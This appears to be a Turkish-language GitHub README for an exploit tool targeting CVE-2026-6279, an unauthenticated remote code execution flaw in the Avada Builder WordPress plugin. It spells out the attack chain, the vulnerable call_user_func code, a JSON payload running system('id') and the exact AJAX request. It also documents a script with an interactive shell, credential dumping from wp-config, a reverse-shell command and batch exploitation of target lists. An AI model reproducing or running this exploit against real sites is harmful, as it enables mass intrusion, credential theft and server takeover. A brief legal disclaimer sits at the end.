xxconi/CVE-2026-6279

## 📋 Özet | Alan | Detay | |------|-------| | **CVE ID** | CVE-2026-6279 | | **Etkilenen** | Avada Builder (Fusion Builder) <= 3.15.2 | | **Tema** | WordPress Avada Theme | | **Aktif Kurulum** | 900.000+ | | **Zafiyet Türü** | PHP Function Injection → Unauthenticated RCE | | **CVSS v3.1** | **9.8 (Critical)** | | **Vektör** | `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H` | | **Kimlik Doğrulama** | ❌ Gerekmiyor | | **Kullanıcı Etkileşimi** | ❌ Gerekmiyor | | **Araştırmacı** | xxcoin | | **Yayın Tarihi** | 2026-05-24 | ## 🔗 Saldırı Zinciri ┌─────────────────────────────────────────────────────────────────┐ │ │ │ 1. NONCE TESPİT │ │ wp_create_nonce('fusion_load_nonce') → UID 0 │ │ [fusion_post_cards] veya [fusion_table_of_contents] │ │ shortcode'u olan herkese açık sayfalarda JS'e eklenir │ │ │ │ │ ▼ │ │ 2. UNAUTHENTICATED AJAX │ │ wp_ajax_nopriv_fusion_get_widget_markup │ │ check_ajax_referer() → sadece nonce geçerliliği kontrol │ │ eder, kullanıcı kimliği doğrulanmaz │ │ │ │ │ ▼ │ │ 3. DESERİALİZASYON │ │ base64_decode(render_logics) → json_decode() │ │ Yapı doğrulaması yok — saldırgan kontrolündeki JSON │ │ │ │ │ ▼ │ │ 4. call_user_func() — ALLOWLIST YOK │ │ get_value() → wp_conditional_tags case │ │ call_user_func($value['function'], $value['args']) │ │ Herhangi bir PHP fonksiyonu çağrılabilir │ │ │ │ │ ▼ │ │ 5. RCE ✓ │ │ system("id") → uid=1000(xxcoin) │ │ Web sunucusu yetkisiyle tam komut yürütme │ │ │ └─────────────────────────────────────────────────────────────────┘ ## 🧬 Teknik Detay ### Zafiyet Noktası `class-fusion-builder-conditional-render-helper.php` — L1531: // VULNERABLE CODE case 'wp_conditional_tags': $decoded = json_decode( base64_decode( $render_logics ), true ); // ❌ Allowlist kontrolü yok return call_user_func( $decoded['function'], $decoded['args'] ); ### Payload Yapısı { "type": "wp_conditional_tags", "value": { "function": "system", "args": "id" } } ### HTTP İsteği POST /wp-admin/admin-ajax.php HTTP/1.1 Host: target.com Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest action=fusion_get_widget_markup fusion_load_nonce= render_logics= widget_type=WP_Widget_Recent_Posts type=WP_Widget_Recent_Posts widget_id=2 number=2 ## ✅ Doğrulanan RCE Fonksiyonları | Fonksiyon | Argüman | Sonuç | Durum | |-----------|---------|-------|-------| | `system()` | `id` | `uid=1000(xenon1337)` | ✅ Başarılı | | `passthru()` | `id` | `uid=1000(xenon1337)` | ✅ Başarılı | | `shell_exec()` | `id` | `uid=1000(xenon1337)` | ✅ Başarılı | | `exec()` | `id` | `uid=1000(xenon1337)` | ✅ Başarılı | | `file_get_contents()` | `/etc/passwd` | `root:x:0:0:...` | ✅ Başarılı | | `proc_open()` | — | — | ❌ 2+ argüman gerekir | | `popen()` | — | — | ❌ 2+ argüman gerekir | ## 🔑 Nonce Neden Bypass Edilebilir? 1. Avada, fusion_load_nonce'u UID 0 (public kullanıcı) için üretir 2. [fusion_post_cards] veya [fusion_table_of_contents] shortcode'u içeren sayfalarda nonce JS çıktısına eklenir → herkes görebilir 3. check_ajax_referer('fusion_load_nonce') sadece nonce'un geçerliliğini doğrular — kullanıcının kimliğini doğrulamaz 4. Sonuç: Herhangi bir ziyaretçi nonce'u alıp endpoint'i çağırabilir ## 📁 Kaynak Kod Referansları | Dosya | Satır | Fonksiyon | Açıklama | |-------|-------|-----------|----------| | `class-fusion-builder-conditional-render-helper.php` | L1083 | `should_render()` | render_logics deserializasyon | | `class-fusion-builder-conditional-render-helper.php` | **L1531** | `get_value()` | ⚠️ `call_user_func()` — allowlist yok | | `fusion-widget.php` | L44 | — | render_logics bağlantısı | | `fusion-widget.php` | L389 | — | `wp_ajax_nopriv` AJAX handler kaydı | | `class-fusion-builder.php` | L7551 | — | UID 0 için deterministik nonce kaydı | ## 🚀 Kurulum & Kullanım ### Gereksinimler pip install requests packaging ### Kullanım # Menülü mod (single + batch) python3 CVE-2026-6279.py # Protokolsüz (otomatik tespit) python3 CVE-2026-6279.py target.com # Protokol ile python3 CVE-2026-6279.py http://target.com python3 CVE-2026-6279.py https://target.com # Port ile python3 CVE-2026-6279.py target.com:8080 python3 CVE-2026-6279.py http://target.com:8080 ### Menü ♡ [1] Single target · interactive shell ◆ [2] Batch scan · file exploit ✗ [3] Exit ### İnteraktif Shell Komutları shell> id # komut çalıştır shell> cd /var/www/html # dizin değiştir shell> upload local.php /tmp/x.php # dosya yükle shell> download /etc/passwd # dosya indir shell> wp-config # DB bilgileri shell> recon # sistem taraması shell> revshell 10.0.0.1 4444 # reverse shell shell> exit # çık ### Batch Tarama # targets.txt formatı: target1.com http://target2.com https://target3.com:8080 # yorum satırı (atlanır) ♡ targets file [targets.txt]: ♡ threads [10]: 30 ♡ command [id]: ♡ output file [vuln.txt]: ## 🖥️ PoC Çıktısı ╔══════════════════════════════════════════════════════════════╗ ║ CVE-2026-6279 · Avada Builder <= 3.15.2 ║ ║ Unauthenticated RCE via call_user_func() ║ ║ Copyright © 2026 xxcoin · Thanks: xxcoin 💜 ║ ╚══════════════════════════════════════════════════════════════╝ ★ Avada tespit edildi! (http://localhost:8888) ★ nonce: b6d7b084c2 (src: /blog/) [shortcode✓] ★ AJAX: http://localhost:8888/wp-admin/admin-ajax.php ★ RCE: system() [B] [WP_Widget_Recent_Posts] • uid=1000(xxcoin) gid=1000(xxcoin) groups=1000 shell> uname -a • Linux debian 6.1.0-21-amd64 #1 SMP x86_64 GNU/Linux shell> wp-config • DB_NAME=wordpress • DB_USER=wp_user • DB_PASSWORD=s3cr3t_p4ss! • DB_HOST=localhost ## 📊 CVSS v3.1 | Metrik | Değer | |--------|-------| | Attack Vector | **Network** | | Attack Complexity | **Low** | | Privileges Required | **None** | | User Interaction | **None** | | Scope | Unchanged | | Confidentiality | **High** | | Integrity | **High** | | Availability | **High** | | **Toplam Skor** | **9.8 — CRITICAL** | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H ## ⚠️ Yasal Uyarı Bu araç yalnızca **yetkili güvenlik testleri** ve **eğitim amaçlı** kullanım içindir. İzinsiz sistemlere erişim yasa dışıdır. Tüm sorumluluk kullanıcıya aittir.

**CVE-2026-6279 · Avada Builder <= 3.15.2 ·xxcoin · 2026** *Special Thanks: Shadow Girlfriend 💜*